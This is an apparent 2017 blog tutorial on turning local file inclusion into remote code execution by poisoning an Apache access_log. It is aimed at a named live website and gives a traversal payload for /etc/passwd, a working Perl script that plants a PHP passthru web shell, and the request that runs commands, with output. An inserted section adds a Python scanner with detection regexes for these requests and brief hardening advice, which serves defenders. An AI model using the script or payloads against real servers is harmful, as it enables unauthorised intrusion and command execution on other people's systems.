
LFI to RCE via access_log injection

NoGe
Jun 6, 2017

Hi guys

Just wanna share a trick from Local File Inclusion/File Path Traversal to
Remote Code Execution by injecting the access_log.

I have a target, http://proqualitycontrol.com/index.php?page=aboutus,
and it’s vulnerable to LFI/FPT. It’s a live website. Inject the target with the
../../../../../../../../../../../../../../../etc/passwd%00 payload.

Now change the payload to /etc/httpd/conf/httpd.conf. Not every server keeps
httpd.conf at this path. To find the access_log location you need to find httpd.conf first.

View source (ctrl+u) for a better view of their httpd.conf.

Open the file called access_log. In this case
/home/pro_99/proqualitycontrol.com/access_log.

My friend @paceander coded this perl script to inject the access_log.

#!/usr/bin/perl -w

use IO::Socket::INET;

my $host = $ARGV[0];
my $port = $ARGV[1];

print “*** Injecting $host:$port access log…\n”;

my $rce = “<?if(get_magic_quotes_gpc()){
\$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?
>”;
$sock = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port,
Proto=>”tcp”) || die “Cant connect to $host:$port!\n”;
print $sock “GET /v0pcr3w “.$rce.” HTTP/1.1\r\n”;
print $sock “Host: “.$host.”\r\n”;
print $sock “Connection: close\r\n\r\n”;
close($sock);

print “*** Done!\n\n”;

Or you can download it here

Run it “perl log.pl <target> 80”

Open the access_log again and search for v0pcr3w. If the word is there then
we’ve successfully injected the access_log.

Now run this line to execute command on server
/home/pro_99/proqualitycontrol.com/access_log%00&cmd=id and
you’ll see the “id” command executed.

Our command executed successfully GET /v0pcr3w uid=48(apache)
gid=48(apache) groups=48(apache),500(webadmin).
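
Every step of this chain is recorded in the same access_log: the traversal probe, the request that planted the PHP tag, and the later request that included the log. The following detection pass over those entries is an added example, not part of the original post; the rule names, function names, sample lines, IP addresses and the /var/www/example path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common/combined format: host ident user [time] "request" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*?)" \d{3} \S+(?P<rest>.*)$')

RULES = {
    # PHP open tag (long or short) in any client-controlled field
    "php_tag_in_log": re.compile(r"<\?"),
    # two or more consecutive parent-directory steps
    "path_traversal": re.compile(r"(?:\.\.[\\/]){2,}"),
    # NUL byte, used to cut off an appended extension on old PHP versions
    "null_byte": re.compile(r"\x00"),
    # parameter value that names a server log or a file under /etc
    "sensitive_file_param": re.compile(r"=[^&\s]*(?:/etc/|(?:access|error)[_.]log)"),
}

def classify(line):
    """Return (client_ip, set_of_rule_names), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Two decoding passes so that double percent-encoding is also seen.
    text = unquote(unquote(m["req"] + m["rest"]))
    return m["ip"], {name for name, rx in RULES.items() if rx.search(text)}

def scan(lines):
    """Per-line findings, plus clients that requested a log file after code was planted."""
    findings, planted, chained = [], False, set()
    for n, line in enumerate(lines, 1):
        ip, tags = classify(line) or (None, set())
        if not tags:
            continue
        findings.append((n, ip, sorted(tags)))
        if "php_tag_in_log" in tags:
            planted = True
        elif planted and "sensitive_file_param" in tags:
            chained.add(ip)  # highest priority: the poisoned log may have been executed
    return findings, chained

# Constructed sample lines (documentation IP ranges, placeholder path and payload)
SAMPLE = [
    '198.51.100.7 - - [06/Jun/2017:10:00:01 +0000] "GET /index.php?page=aboutus HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Jun/2017:10:01:12 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Jun/2017:10:03:40 +0000] "GET /marker <?php /* constructed placeholder */ ?> HTTP/1.1" 400 226 "-" "-"',
    '192.0.2.10 - - [06/Jun/2017:10:04:05 +0000] "GET /index.php?page=/var/www/example/access_log%00&cmd=id HTTP/1.1" 200 9911 "-" "Mozilla/5.0"',
]
```

On the server side, the chain breaks if the page parameter is resolved against a fixed allowlist of templates and the web server account cannot read its own log files.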

Note: The web administrator has been notified about this vulnerability.

That's all guys, happy hacking!
